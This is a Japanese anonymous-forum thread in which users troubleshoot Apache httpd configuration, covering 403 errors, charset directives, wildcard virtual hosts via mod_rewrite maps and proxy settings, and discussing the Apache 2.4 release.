2011/09/30(金) 00:41:01.39[Fri Sep 30 00:38:36 2011] [notice] Parent: Received restart signal -- Restarting the server.
[Fri Sep 30 00:38:36 2011] [notice] Child 6636: Exit event signaled. Child process is ending.
[Fri Sep 30 00:38:36 2011] [notice] Apache/2.2.21 (Win32) configured -- resuming normal operations
[Fri Sep 30 00:38:36 2011] [notice] Server built: Sep 9 2011 10:26:10
[Fri Sep 30 00:38:36 2011] [notice] Parent: Created child process 4464
[Fri Sep 30 00:38:37 2011] [notice] Child 4464: Child process is running
[Fri Sep 30 00:38:37 2011] [notice] Child 4464: Acquired the start mutex.
[Fri Sep 30 00:38:37 2011] [notice] Child 6636: Released the start mutex
[Fri Sep 30 00:38:37 2011] [notice] Child 4464: Starting 64 worker threads.
[Fri Sep 30 00:38:37 2011] [notice] Child 4464: Starting thread to listen on port 8080.
[Fri Sep 30 00:38:45 2011] [notice] Child 6636: All worker threads have exited.
[Fri Sep 30 00:38:45 2011] [notice] Child 6636: Child process is exiting
[Fri Sep 30 00:39:02 2011] [error] [client 127.0.0.1] client denied by server configuration: C:/xampp/Apache/htdocs/
0651名無しさん@お腹いっぱい。
2011/09/30(金) 00:45:16.71そこに 403 の原因が書いてるではないか。
0652636
2011/09/30(金) 01:11:25.26いろいろググってみたので明日やってみます。
ヒントを下さってありがとうございました。
0653名無しさん@お腹いっぱい。
2011/09/30(金) 02:24:50.28Apache統合スレ 11 (HTTPServer以外も含む)
http://hibari.2ch.net/test/read.cgi/mysv/1286137109/
0654名無しさん@お腹いっぱい。
2011/09/30(金) 02:33:04.318080はdst portだろ。
0655名無しさん@お腹いっぱい。
2011/09/30(金) 09:40:34.350656名無しさん@お腹いっぱい。
2011/09/30(金) 10:35:16.090657名無しさん@お腹いっぱい。
2011/10/01(土) 11:17:49.27ファイル単位で接続数制限かけたいと思ってる
0658名無しさん@お腹いっぱい。
2011/10/09(日) 17:03:05.04しらね。
それ系のは、mod_statusのスコアボード見て各プロセスやスレッドが
その瞬間に処理してるURLの中から単純にマッチするものを
カウントしてるだけだから、動作的にはほとんど問題ないかと。
注意すべき点としては、MaxClientsみたいな同時アクセス数の数値を
あまり大きくしている場合は、カウントしなければならない対象も
かなりの数になるんで、オーバーヘッドが高くなる(かも)ってことぐらいかな?
関係ないが、今度はまたmod_proxyにセキュリティホールかw
0659名無しさん@お腹いっぱい。
2011/10/11(火) 21:02:51.770660名無しさん@お腹いっぱい。
2011/10/16(日) 14:13:43.19ファイル単位で同時接続数見るのはスコアボードじゃできないよ
0661名無しさん@お腹いっぱい。
2011/10/18(火) 07:36:25.840662名無しさん@お腹いっぱい。
2011/10/18(火) 07:45:13.620663名無しさん@お腹いっぱい。
2011/10/18(火) 16:28:25.06立てろ
0664名無しさん@お腹いっぱい。
2011/10/19(水) 06:50:34.730665名無しさん@お腹いっぱい。
2011/10/19(水) 11:39:18.13nginxも相当ぶっとんでるな。
0666名無しさん@お腹いっぱい。
2011/10/19(水) 12:37:28.55「にんじんx」?
0667名無しさん@お腹いっぱい。
2011/10/19(水) 13:10:55.14惜しい!
0668名無しさん@お腹いっぱい。
2011/10/19(水) 13:58:21.860669名無しさん@お腹いっぱい。
2011/10/21(金) 11:18:08.93あれ?そうだっけ?
Extend何とかの設定入れたら取れたと思ったが… 記憶違いかな。
ってか、スコアボードで取れないとしたら他にどんな実装があるっけ?
モジュール自前で共有メモリに書き出して管理するぐらいだろうか。
0670名無しさん@お腹いっぱい。
2011/10/22(土) 11:04:10.65telnetして数秒たつとこうなるんだけど
これ無効にしたり、時間伸ばしたりできないの?
教えてください
0671名無しさん@お腹いっぱい。
2011/10/22(土) 11:33:46.520672名無しさん@お腹いっぱい。
2011/10/22(土) 11:43:47.08apacheにtelnetし接続して8秒ほどたつと
Connection closed by foreign host.
と出ます教えてください
0673名無しさん@お腹いっぱい。
2011/10/22(土) 11:48:15.880674名無しさん@お腹いっぱい。
2011/10/22(土) 13:41:49.24なんでそんなことしたいの。
0675名無しさん@お腹いっぱい。
2011/10/22(土) 14:09:58.39パフォーマンスチューニング系の話題は良い感じに纏めてる先人が多数いらっしゃるから
ググれカス
0676名無しさん@お腹いっぱい。
2011/10/22(土) 16:15:19.35スコアボードにr->filenameは保存されない。
なので、ファイル単位で同時接続数調べようと思ったら子プロセス同士でプロセス間通信しないとだめ。
0677名無しさん@お腹いっぱい。
2011/10/22(土) 16:17:07.100678名無しさん@お腹いっぱい。
2011/10/22(土) 16:42:08.960679名無しさん@お腹いっぱい。
2011/10/22(土) 17:43:43.89tcpのセッションの話とapacheのタイムアウトは別物。
0680名無しさん@お腹いっぱい。
2011/10/22(土) 19:20:35.400681名無しさん@お腹いっぱい。
2011/10/23(日) 10:39:49.42ページ自体が自分の期待する文字コードでファイルを返してくれません。
具体的には、 hoge.html というhtmlページは shift-jis で記述しており
shift-jisで閲覧される事を想定しているのですが、utf-8としてコンテンツが吐き出されている様です。
たとえば、 下記の様な特定のディレクトリにあるファイルのみ(←重要★)
文字コードを変更するにはどうすればよいでしょうか?
hoge_dir/hoge/
hoge_1.html
hoge_2.html
0682名無しさん@お腹いっぱい。
2011/10/23(日) 12:09:59.37AddDefaultCharset ...
</Directory>
0683名無しさん@お腹いっぱい。
2011/10/23(日) 12:59:36.51次の2パターンを試してもやはり駄目でした。どこに問題があるのでしょうか?
hoge_dir/hoge/
.htaccess
hoge_1.html
hoge_2.html
【.htaccessの設定】
その@
<Directory .>
AddDefaultCharset Shift_JIS
</Directory>
そのA
AddType "text/html; charset=Shift_JIS" sjis
0684名無しさん@お腹いっぱい。
2011/10/23(日) 13:13:27.27アホか。よく考えろ。
0685名無しさん@お腹いっぱい。
2011/10/23(日) 13:18:15.60そもそも <Directory>はhttpd.cnf とかにしか指定出来ないのではないでしょうか?
うーん文字化けしてしまう。
html ⇒ php にして文字コードを指定すれば文字化けしないんですけど・・・
0686名無しさん@お腹いっぱい。
2011/10/23(日) 18:50:21.110687名無しさん@お腹いっぱい。
2011/10/24(月) 02:40:40.53とかじゃないの
そのhtmlをUTF-8にするのはだめなん?
0688名無しさん@お腹いっぱい。
2011/10/24(月) 14:17:58.37AddCharsetというディレクティブもあることも知らずに回答者気取りとかww
0689名無しさん@お腹いっぱい。
2011/10/24(月) 14:35:40.540690名無しさん@お腹いっぱい。
2011/10/25(火) 05:37:52.42こんなの設定してる鯖屋は萎えるな。
0691名無しさん@お腹いっぱい。
2011/10/26(水) 05:19:30.01設定の差分をリストアップするようなソフトがあればおしえてください
0692名無しさん@お腹いっぱい。
2011/10/26(水) 05:27:59.24ん?こーゆーの?
http://www.geocities.co.jp/SiliconValley-SanJose/8165/winmerge.html
0693名無しさん@お腹いっぱい。
2011/10/26(水) 08:28:10.87diffコマンド
0694名無しさん@お腹いっぱい。
2011/10/26(水) 10:31:02.56ちゃんと-uつけろよ?
0695名無しさん@お腹いっぱい。
2011/10/26(水) 14:24:34.91AddDefaultCharset noneって見ただけで笑えるよねw
noneって設定値はcharset=noneの設定だからw
0696名無しさん@お腹いっぱい。
2011/10/26(水) 20:56:51.640697名無しさん@お腹いっぱい。
2011/10/26(水) 21:05:11.460698名無しさん@お腹いっぱい。
2011/10/26(水) 22:01:20.310699名無しさん@お腹いっぱい。
2011/10/26(水) 22:16:13.590700名無しさん@お腹いっぱい。
2011/10/26(水) 23:51:55.890701名無しさん@お腹いっぱい。
2011/10/27(木) 10:28:11.25その環境変数があれば、指定のディレクトリへのアクセスを許可
ということをやりたいのですが、
環境変数を元にallowするにはどうすればいいですか?
0702名無しさん@お腹いっぱい。
2011/10/27(木) 10:32:12.13っ SetEnvIf
0703名無しさん@お腹いっぱい。
2011/10/27(木) 10:33:39.14管理用のIPアドレス表記があちこちにあるのを避けたいんです
0704名無しさん@お腹いっぱい。
2011/10/27(木) 10:34:29.90ありがとうございます。
SetEnvIfを使って、環境変数のセットをするところまではきたのですが
その先がわからないんです・・
0705名無しさん@お腹いっぱい。
2011/10/27(木) 10:44:03.98.htaccessをリンクで増やして実体は一つにするとか
0706名無しさん@お腹いっぱい。
2011/10/27(木) 10:47:43.340707名無しさん@お腹いっぱい。
2011/10/27(木) 11:00:51.75あーこれです!
ありがとうございました
0708名無しさん@お腹いっぱい。
2011/10/27(木) 11:57:06.57http://www.tangent.org/
ここが開発元っぽいけど情報がない
0709名無しさん@お腹いっぱい。
2011/10/27(木) 12:17:13.00http://hg.tangent.org/
0710名無しさん@お腹いっぱい。
2011/10/27(木) 14:10:12.36ありがとうございます
日付的に更新とまってるのかな?
0711名無しさん@お腹いっぱい。
2011/10/29(土) 23:57:40.290712名無しさん@お腹いっぱい。
2011/10/31(月) 23:15:51.05httpd.confで、VirtualHostを設定しているのですが、
複数のドメインのサブドメインをアスタリスク等で一度に設定できますか?
例えば
hoge.comの場合
www.hoge.com → DocumentRoot /home/hoge/www/
aaa.hoge.com → DocumentRoot /home/hoge/www2/
bbb.hoge.com → DocumentRoot /home/hoge/www3/
hoge.jpの場合
www.hoge.jp → DocumentRoot /home/hoge/www/
aaa.hoge.jp → DocumentRoot /home/hoge/www2/
bbb.hoge.jp → DocumentRoot /home/hoge/www3/
違うドメインですが、
サブドメインが一緒の場合、同じDocumentRootにしたいのです。
一つ一つ設定するよりも、正規表現ぽく設定したいのですが・・
よろしくおねがいします。
0713名無しさん@お腹いっぱい。
2011/10/31(月) 23:21:29.400714名無しさん@お腹いっぱい。
2011/11/01(火) 00:23:48.73vhost_alias
0715名無しさん@お腹いっぱい。
2011/11/01(火) 00:29:21.320716名無しさん@お腹いっぱい。
2011/11/01(火) 00:43:50.980717712
2011/11/01(火) 00:47:15.07ありがとうございます。
調べてみたら、mod_vhost_alias は
aaa.hoge.com → /home/hoge/aaa/
bbb.hoge.com → /home/hoge/bbb/
としかできないんですよね?
aaa.hoge.com → /home/hoge/www1/
bbb.hoge.com → /home/hoge/www1/
ccc.hoge.com → /home/hoge/www2/
のようには、難しいですかね?
0718名無しさん@お腹いっぱい。
2011/11/01(火) 00:53:43.550719712
2011/11/01(火) 01:02:53.21>>712に書いてあるような、hoge.comやhoge.jp等々の設定は、
ドメインごとに設定をしなければならないってことですかね。
ドメイン横断でVirtualHostをすること自体が間違っているんですかね?
0720名無しさん@お腹いっぱい。
2011/11/01(火) 09:53:24.66どういう基準で判断させるつもり?
0721720
2011/11/01(火) 09:54:37.520722名無しさん@お腹いっぱい。
2011/11/01(火) 10:30:13.26やろうと思えばできるかもしれんが、正規表現ぽく簡単には無理かも。
とりあえずは、www1とかをサブドメインにしておけばやりたいことは
達成できるんじゃないの?
0723名無しさん@お腹いっぱい。
2011/11/01(火) 10:31:59.13ならスクリプトとかで生成しちゃえば。
あとおやくそくの注意だけど
実在するドメイン名を例に使っちゃいかんよ。
0724712
2011/11/01(火) 11:24:08.65ありがとうございます。
手でかけないほどじゃないですが、新しいドメインを運用する際に、
apacheのconfをいじりたくは無かったので、聞いて見ました。
個別に設定することにします。
今後はexample.comとかにします。
0725名無しさん@お腹いっぱい。
2011/11/01(火) 20:00:24.72mod_rewrite
0726名無しさん@お腹いっぱい。
2011/11/02(水) 05:45:31.42ちょっと興味があって、で思ったより簡単にできたので紹介
※ 長文注意
* httpd.conf(一部省略、log は確認の為とりあえず 10、本運用では 0 に)
※ ServerName は wildcard 使えないはず(未確認)。
※ セキュリティ面の考慮はしてないです。何か問題あるかも
※ RewriteMap はファイルを変更すると即時(apacheの再起動など無く)反映されます。
<VirtualHost *:80>
ServerAdmin webadmin
DocumentRoot /var/www/example/base/
ServerName example.com
ServerAlias *.example.com
ServerAlias *.example.net
RewriteEngine on
RewriteLog "/var/log/httpd/example_rewrite_log"
RewriteLogLevel 10
RewriteMap doc_map txt:/etc/apache/map.txt
RewriteCond %{HTTP_HOST} ^([^.]+).example.(com|net)$
RewriteRule ^/(.*)$ /var/www/example/${doc_map:%1}/$1 [L]
* /etc/apache/map.txt
www www
aaa www2
bbb www3
次に続く
0727名無しさん@お腹いっぱい。
2011/11/02(水) 05:48:04.13* directory
$ head /var/www/example/*/*.html
==> /var/www/example/base/index.html <==
base
==> /var/www/example/www/index.html <==
www
==> /var/www/example/www2/index.html <==
www2
==> /var/www/example/www3/index.html <==
www3
* result
$ curl -H 'Host: example.com' http://localhost/index.html
base
$ curl -H 'Host: www.example.com' http://localhost/index.html
www
$ curl -H 'Host: aaa.example.com' http://localhost/index.html
www2
$ curl -H 'Host: bbb.example.com' http://localhost/index.html
www3
$ curl -H 'Host: ccc.example.com' http://localhost/index.html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
略
=> rewrite_log より /var/www/example//index.html へアクセスしていることを確認
0728名無しさん@お腹いっぱい。
2011/11/02(水) 10:01:58.490729名無しさん@お腹いっぱい。
2011/11/02(水) 10:23:28.720730712
2011/11/02(水) 10:48:05.47ありがとうございます。
なるほど。RewriteEngineでやっちゃうって感じですね。
これだと、サブドメインの追加はconfをいじらないですみますが、
example1.comとかを追加する場合は、confをいじらないとって感じですね。
かなり参考になりそうなので、ちょっといじってやってみます!
ありがとうございます!
0731名無しさん@お腹いっぱい。
2011/11/02(水) 11:02:26.52> ※ RewriteMap はファイルを変更すると即時(apacheの再起動など無く)反映されます。
つまり1アクセス毎にファイル読んでるってことだよね。大丈夫なのかな。
0732名無しさん@お腹いっぱい。
2011/11/02(水) 12:45:16.000733名無しさん@お腹いっぱい。
2011/11/02(水) 13:19:48.80.htaccess は1アクセスごと再帰的に読まれてファイルアクセスが増えるから重くなるとはいうね。
例えば http://example.jp/foo/bar/baz/qux/foobar/index.html っていうファイルにアクセスする場合、
/docroot/foo/.htaccess, /docroot/foo/bar/.htaccess, ... と1回のアクセスで最大5個の .htaccess が読まれる。
よっぽど大量じゃないとパフォーマンスに影響しないだろうけど。
知らんけどRewriteMapも即時に反映されるなら毎回読んでるのかも。
0735733
2011/11/02(水) 13:23:14.090736名無しさん@お腹いっぱい。
2011/11/02(水) 14:47:52.41Note
For plain text and DBM format files the looked-up keys are cached
in-core until the mtime of the mapfile changes or the server does a
restart. This way you can have map-functions in rules which are used
for every request. This is no problem, because the external lookup
only happens once!
0737726
2011/11/02(水) 15:30:27.02RewriteMap txt: を実運用サイトで使ってる身としての意見や
経験をちょっとだけ
導入当初(4年ぐらい前)にベンチを取ったけど、
「1台で 200pv/sec 程度の ab を使ったテスト」を行い、
100行ぐらいの RewriteMap txt: あり/なし で差が出なかった。
実運用に入ってからも上に乗るアプリのほうが Apache なんかよりも
よっぽど重いので正直わからない。
それより、ファイルを変更したら即座に反映されることのほうが
運用する上ではよっぽど怖い。
0738名無しさん@お腹いっぱい。
2011/11/02(水) 23:56:54.16お前こそ頭大丈夫か?マップとか逐次設定増やす必要あるだろ。
性能も悪いし効率も悪い。
0739名無しさん@お腹いっぱい。
2011/11/03(木) 08:33:31.65お前、本物の知障だろ。どんなに頭悪いのかは足りない頭で考えろ。ww
しかも>>737が性能効率には全く影響なかったといった後でその発言。www
0740名無しさん@お腹いっぱい。
2011/11/03(木) 10:49:36.62おまえやっぱ素人臭いな。100行程度の評価でうれしそうだし、逐次設定なんて誰でもできる。
あんな設定で俺すげーされたらかなわんわ。
黙ってた方がいいよ、頭も悪そうだし。
0742名無しさん@お腹いっぱい。
2011/11/03(木) 12:45:34.81強引にrewrite使えば誰でもできるけど、もっと簡単にやる方法がないかってのを聞いてるんでしょってこと。
お前どうしたの?そんなに認められないのが苦痛?
0743名無しさん@お腹いっぱい。
2011/11/03(木) 12:49:48.24それに反してるってことだろ?
0744名無しさん@お腹いっぱい。
2011/11/04(金) 08:12:59.07プログラマは手抜きをするためならいかなる努力も厭わない
だ
0745名無しさん@お腹いっぱい。
2011/11/09(水) 19:10:57.26どの行にもerror_logの後部にreferrerがついてしまいます
調べてみたのですが、外し方が分かりません
エラーログが見づらいので、助けてください!
0746名無しさん@お腹いっぱい。
2011/11/09(水) 19:12:23.88httpd.conf の ErrorLog はどう書いてんの。
0747名無しさん@お腹いっぱい。
2011/11/09(水) 19:13:27.64http://hibari.2ch.net/hosting/
0748745
2011/11/09(水) 19:13:54.59ErrorLogは
ErrorLog logs/error_log
こんなかんじです
0749745
2011/11/09(水) 19:16:12.27rapid siteのスレが・・・まぁ人が少なそうだったので・・・
すいませんwおじゃましてみましたw
0750名無しさん@お腹いっぱい。
2011/11/10(木) 00:54:37.030751745
2011/11/10(木) 11:54:33.12エラーログのフォーマットってcustomlogで設定できないっぽいのですが
0752名無しさん@お腹いっぱい。
2011/11/11(金) 16:11:55.02逆逆。CustomLogを使ってエラーログを吐かせるの。
0753名無しさん@お腹いっぱい。
2011/11/11(金) 16:52:00.54そんなことできるの?
0754745
2011/11/11(金) 19:15:52.31あ、エラーログと別に、デバッグログとして吐き出すってことですね。
普通のエラーログに出るようなWarning等々も吐き出せるってことですよね。
ちょっと調べてみます!
0755名無しさん@お腹いっぱい。
2011/11/12(土) 10:08:35.97自宅のLanの中にサーバを立ち上げて、
test1.myserv.com / test2.myserv.comという風にバーチャルホストでサイトを作っています
で、クライアントのマシンではhostsを弄ってドメインでブラウザからアクセスできるようにしています
ところが、hostsを触れない端末があり(iPod touchですが)、アクセスできなくて困っています
どうやって解決したら良いでしょうか?
アドバイスもらえると嬉しいです、よろしくお願いします
0756名無しさん@お腹いっぱい。
2011/11/12(土) 10:26:04.88そんなの初心者スレで質問する内容だ
0757名無しさん@お腹いっぱい。
2011/11/12(土) 10:29:39.19apache関係ないな。
dnsmasqおすすめ。
5行位書けば設定可能。
hostsも見てくれるので、楽。
で、すべての機器はそのDNSを参照する。
dhcpdもついてるよ。
0758名無しさん@お腹いっぱい。
2011/11/12(土) 10:30:44.330759名無しさん@お腹いっぱい。
2011/11/12(土) 13:08:07.49apacheで対応できることじゃないですね、すみませんでした
dnsmasqっての調べてみます
ありがとうございました!
0760名無しさん@お腹いっぱい。
2011/11/12(土) 13:16:06.00ネタだよねソレ?
0761名無しさん@お腹いっぱい。
2011/11/12(土) 14:20:10.970762名無しさん@お腹いっぱい。
2011/11/12(土) 14:34:35.470763名無しさん@お腹いっぱい。
2011/11/13(日) 22:24:26.610764名無しさん@お腹いっぱい。
2011/11/14(月) 01:32:11.960765名無しさん@お腹いっぱい。
2011/11/14(月) 03:15:22.29どわいなみっくどぅおめいんすわぁーびす
0766名無しさん@お腹いっぱい。
2011/11/14(月) 04:21:26.820767名無しさん@お腹いっぱい。
2011/11/28(月) 21:45:59.730768名無しさん@お腹いっぱい。
2011/11/29(火) 22:17:48.680769名無しさん@お腹いっぱい。
2011/12/17(土) 21:52:43.330770名無しさん@お腹いっぱい。
2011/12/17(土) 23:52:37.75http://news.mynavi.jp/news/2007/02/16/364.html
0771名無しさん@お腹いっぱい。
2011/12/18(日) 03:58:14.80いつのニュースだよ
0772名無しさん@お腹いっぱい。
2011/12/18(日) 17:03:35.470773名無しさん@お腹いっぱい。
2012/01/27(金) 05:21:05.720774名無しさん@お腹いっぱい。
2012/01/27(金) 05:36:17.60On Sunday 22 January 2012, Jim Jagielski wrote:
> I am rescinding the vote for 2.4.0. Instead, on Monday (or
> Tuesday at the latest) I will T&R 2.4.1.
Plese wait until at least the core output filter issue is completely
resolved. Thanks.
0775名無しさん@お腹いっぱい。
2012/01/29(日) 01:55:04.59servertokens profが有効化されないし
cssフォルダのcssファイルにアクセス権限がないためアクセス出来ませんっていわれるし
もうわけわかめ
0776名無しさん@お腹いっぱい。
2012/01/29(日) 02:27:36.010777名無しさん@お腹いっぱい。
2012/01/29(日) 02:42:32.870778名無しさん@お腹いっぱい。
2012/01/29(日) 13:16:44.84っていうか仕事が増えるから2.4出さないでくれ
0779名無しさん@お腹いっぱい。
2012/01/29(日) 15:18:25.41指定したユーザーに権限渡したらすんなりと動きました
0780名無しさん@お腹いっぱい。
2012/01/30(月) 08:25:36.260781名無しさん@お腹いっぱい。
2012/01/31(火) 13:39:52.43てか、Apache を使うのをやめたらどう?
0782名無しさん@お腹いっぱい。
2012/01/31(火) 13:42:03.07サーバ管理をやめた方がいいかも。
0783名無しさん@お腹いっぱい。
2012/01/31(火) 20:25:35.30むしろ仕事がなくなるぞ
0784名無しさん@お腹いっぱい。
2012/02/01(水) 18:29:24.200785名無しさん@お腹いっぱい。
2012/02/11(土) 12:03:56.95Nginx強く成長、Webサーバとして確固たるポジションに - Netcraft
http://news.mynavi.jp/news/2012/02/09/028/index.html
人気急増の高速WebサーバーNginx、商用サポートサービスがスタート
http://sourceforge.jp/magazine/12/02/10/042249
0786名無しさん@お腹いっぱい。
2012/02/11(土) 13:13:15.49静的コンテンツを配信する軽くて高速なhttpdと、動的コンテンツ用の高機能だけど
重いhttpdとで分化してきているってだけの話
0787名無しさん@お腹いっぱい。
2012/02/11(土) 13:57:05.52http://www.infoq.com/jp/news/2012/01/Katz-CouchDB-Couchbase-Server
> 氏はこの製品を“絶対にApacheプロジェクトにはしない”としている。氏によると理由は、
> “コンセンサスを取りながら開発する方法がプロジェクトの競争力を制限してしまう地点に
> 到達した"からだ。
> InfoQ: あなたは、Apacheプロジェクトの動きは遅く、必ずしも競争力のある製品を生まない、
> と言っているように思います。Apacheの主な問題は何ですか。
> DK: 私たちは顧客やユーザの声に敏感に反応する必要があります。
> しかし、Apacheプロジェクトのやり方だとそれが困難だと分かりました。
> コードの同期を維持し続けるのはとても大変でした。
0788名無しさん@お腹いっぱい。
2012/02/11(土) 15:27:37.170789名無しさん@お腹いっぱい。
2012/02/11(土) 16:17:23.99>
> > A heads up that I plan to T&R 2.4.1 within the next 48hrs...
> > Why 48hrs? To give people who might either have patches/backports
> > time to fold them in, as well as give people who may not support
> > a T&R time to note their disagreement and provide valid reasons
> > behind it.
>
0790名無しさん@お腹いっぱい。
2012/02/11(土) 16:30:13.96http://sourceforge.jp/magazine/11/12/27/045229
> 現在ASFの元でインキュベーションプロジェクトとして運営されている。
> その間、OpenOffice.orgの一部の開発者がフォークプロジェクト
> 「LibreOffice」(The Document Foundation)を設立、OpenOffice.orgは求心力を失ったと見る向きもある。
LibreOfficeの連中はapacheとはもう関わりたくないってさw
0791名無しさん@お腹いっぱい。
2012/02/11(土) 23:19:12.520792名無しさん@お腹いっぱい。
2012/02/12(日) 00:21:54.62LibreOfficeがOpenOfficeからフォークしたのはOpenOfficeがASFに託される前だろ
0793名無しさん@お腹いっぱい。
2012/02/13(月) 07:11:57.160794名無しさん@お腹いっぱい。
2012/02/18(土) 11:19:06.31> be released as GA.
0795名無しさん@お腹いっぱい。
2012/02/20(月) 13:20:34.66やればできる。
0796名無しさん@お腹いっぱい。
2012/02/20(月) 18:46:33.830797名無しさん@お腹いっぱい。
2012/02/20(月) 23:18:58.830798名無しさん@お腹いっぱい。
2012/02/21(火) 10:23:44.670799名無しさん@お腹いっぱい。
2012/02/21(火) 22:29:25.14The Apache HTTP Server Project is pleased to announce
http://www.apache.org/dist/httpd/Announcement2.4.html
0800名無しさん@お腹いっぱい。
2012/02/22(水) 23:04:13.20http://internet.watch.impress.co.jp/docs/news/20120222_513656.html
0801名無しさん@お腹いっぱい。
2012/02/23(木) 01:53:38.89http://blog.matsumoto-r.jp/?p=1812
>いずれにせよ、Apache2.4.1は大きく性能改善がなされ、大量のアクセスが来た場合の処理耐性はnginxよりも良いということになる。
0802名無しさん@お腹いっぱい。
2012/02/23(木) 02:19:34.500803名無しさん@お腹いっぱい。
2012/03/02(金) 16:30:32.820804名無しさん@お腹いっぱい。
2012/03/03(土) 23:16:21.450805名無しさん@お腹いっぱい。
2012/03/03(土) 23:31:22.99ほんと、まじでお願いします
0806名無しさん@お腹いっぱい。
2012/03/03(土) 23:34:25.620807名無しさん@お腹いっぱい。
2012/03/04(日) 01:21:04.090808名無しさん@お腹いっぱい。
2012/03/04(日) 09:57:26.97OptionsでIndexesを無効にし、DirectoryIndexにindex.htmlを指定している場合
URLが末尾/で終わったアクセスをした時にindex.htmlがなかったら403ではなく404を返したい。
つまり
http://hoge.com/img/
にアクセスした時に
http://hoge.com/img/index.html
がなかったらForbidenじゃなくてNot Foundを返答したい。
普通は403なんだろうけど…
0809名無しさん@お腹いっぱい。
2012/03/04(日) 20:27:31.460810808
2012/03/04(日) 22:05:34.43この手もあったか
取り敢えず>>808の書き込みの後調べてみて
1.mod_autoindex.soを読み込まないようにする
2.OptionsでIndexesを有効にする。
と設定することで「オートインデックスの作成は許可するが機能は無効」になるので
Not Foundになったけど…。
0811名無しさん@お腹いっぱい。
2012/03/04(日) 23:28:33.940812名無しさん@お腹いっぱい。
2012/03/05(月) 10:17:31.830813名無しさん@お腹いっぱい。
2012/03/05(月) 10:23:29.960814名無しさん@お腹いっぱい。
2012/03/22(木) 03:32:53.11TLS v1.1 v1.2 サポートされるから入れとけよ
0815名無しさん@お腹いっぱい。
2012/03/27(火) 11:05:21.92のだけどどうすればいいでしょうか?
使ってるApacheはCentOS 5.8 でrpmで入るもので、httpd-2.2.3-63.el5.centos.1 です。
.htaccess に AddDefaultCharset UTF-8 とか書いてみても効かない様で、現在は
Content-Type: text/html; charset=iso-8859-1
になっています。
0816名無しさん@お腹いっぱい。
2012/03/27(火) 11:27:12.41IndexOptions Charset=UTF-8
0817名無しさん@お腹いっぱい。
2012/03/28(水) 03:01:46.58d
0818名無しさん@お腹いっぱい。
2012/03/28(水) 14:48:53.59状況によっては、こっちのほうがいいかもね。
IndexOptions +Charset=UTF-8
0819名無しさん@お腹いっぱい。
2012/04/09(月) 10:22:04.59apacheで大量のコンテンツを処理する必要があるんだけど、
画像コンテンツは転送が完了するまでapacheのMaxClientsを消費するんだろうか?
ユーザが遅い回線で見てたらMaxClientsはどんどん消費されるんだろうか?
0820名無しさん@お腹いっぱい。
2012/04/09(月) 10:25:22.24する
0821名無しさん@お腹いっぱい。
2012/04/09(月) 11:13:07.000822名無しさん@お腹いっぱい。
2012/04/09(月) 11:18:46.94助かった。
0823名無しさん@お腹いっぱい。
2012/04/16(月) 15:11:55.08PHPスクリプトをWEB公開ディレクトリに配置した状態で(←これがあまり宜しくないとは思うけど)
ブラウザからはアクセス出来ないけれど
cronからはキック出来る様にはどうしたらいいですか?
0824名無しさん@お腹いっぱい。
2012/04/16(月) 16:52:06.390825名無しさん@お腹いっぱい。
2012/05/23(水) 13:56:45.86前準備としてブラウザより各ディレクトリ(ファイル)にアクセス
できることの確認を行っているのですが
なぜかcakephpディレクトリの中にはアクセスする事が出来ません。何が原因なのでしょうか?
※そもそも.htaccessを無効にしたのでアクセス出来なくちゃならないハズなんですが・・・
【ブラウザからアクセスした場合】
◯ http://localhost/hoge/test.php
× http://localhost/cakephp/test.php
【cakephpディレクトリ内のファイル】
/var/www/html/cakephp
test.php
.htaccess → リネーム: htaccess_bk
【コマンドラインから直接スクリプトを叩いた場合】
[root@localhost cakephp]# php test.php
string(4) "test"
0826名無しさん@お腹いっぱい。
2012/05/23(水) 14:17:16.57パソコンが動きませんレベルで、解答しろと?
0827825
2012/05/23(水) 14:30:11.32すみません。ログを載せるのが漏れてました。
やはり、
.htaccess を無効にしているのに表示されないのは不思議でなりません。
【Apacheのエラーログ】
[Wed May 23 14:25:00 2012] [error] [client 127.0.0.1] (13)Permission denied: access to /cakephp/test.php denied
0828名無しさん@お腹いっぱい。
2012/05/23(水) 14:46:43.86logに書いてあるとおり、パーミッション権限の設定によりアクセス不可能。
こんな、中学レベル以下の英語が読めないのはどうかと思う。
0829名無しさん@お腹いっぱい。
2012/05/27(日) 19:28:07.50ProxyRequests On
ProxyVia On
<Proxy *>
Order deny,allow
Deny from all
Allow from internal.example.com
</Proxy>
</VirtualHost>
こんな設定でフォワードプロキシしてるときに、リクエストを8889番ポートに流そうと以下の設定を追加しても流れないんですが、どう書けば流せますか?
RewriteEngine On
RewriteRule ^/(.*)$ http://localhost:8889/$1 [P,L]
0830名無しさん@お腹いっぱい。
2012/05/27(日) 19:39:20.22基本的にはバーチャルホスト外に書いたRewriteRuleはバーチャルホスト内には適用されない。
(参考) http://httpd.apache.org/docs/2.2/mod/mod_rewrite.html#rewriteoptions
そのRewriteRuleをVirtualHostの中に書けば済む話だし、
さらに言えばRewriteRuleじゃなくてProxyPassで書けばいい
0831名無しさん@お腹いっぱい。
2012/05/27(日) 19:50:02.94レスを参考に下のように設定を書き換えてapacheを再起動しましたが、解決しませんでした。
8889番で待ち受けている方にはアクセスが来ないままです。
<VirtualHost *:8888>
ProxyRequests On
ProxyVia On
<Proxy *>
Order deny,allow
Deny from all
Allow from internal.example.com
</Proxy>
ProxyPass / http://localhost:8889/
</VirtualHost>
0832名無しさん@お腹いっぱい。
2012/05/27(日) 21:58:02.730833名無しさん@お腹いっぱい。
2012/05/27(日) 23:57:37.65できました。ありがとうございます。
RewriteRuleやProxyPassはリバースプロキシのときに使うものでした。
0834名無しさん@お腹いっぱい。
2012/06/02(土) 19:10:21.94REMOTE_ADDRベースの allow / deny リストをLDAPに移したいのですが、
そういったモジュールあるでしょうか?
http://httpd.apache.org/docs/2.0/ja/mod/mod_auth_ldap.html
これはどうも REMOTE_USER を見ている様子なので。。
mod_perl で自分で作るしかないですかね
0835名無しさん@お腹いっぱい。
2012/06/08(金) 00:17:11.10httpdのプロセスがそれだけ占有されます。
そのipからはだいたい1分間に20回くらいのリクエストなのでそれほどアクセス量は多くありません。
KeepAliveTimeoutは5秒です。
接続が長時間残る原因はどんなものが考えられるでしょうか?
centos、apache2.2です
0836名無しさん@お腹いっぱい。
2012/06/08(金) 09:28:14.87ちゃんと時間どおり切れるのかどっちだ。
前者なら知らね。後者なら単に常にkeepaliveでリクエストするように
プロクシが設定されてるだけなんじゃね。
0837名無しさん@お腹いっぱい。
2012/06/08(金) 10:36:12.950838名無しさん@お腹いっぱい。
2012/06/08(金) 10:42:16.930839835
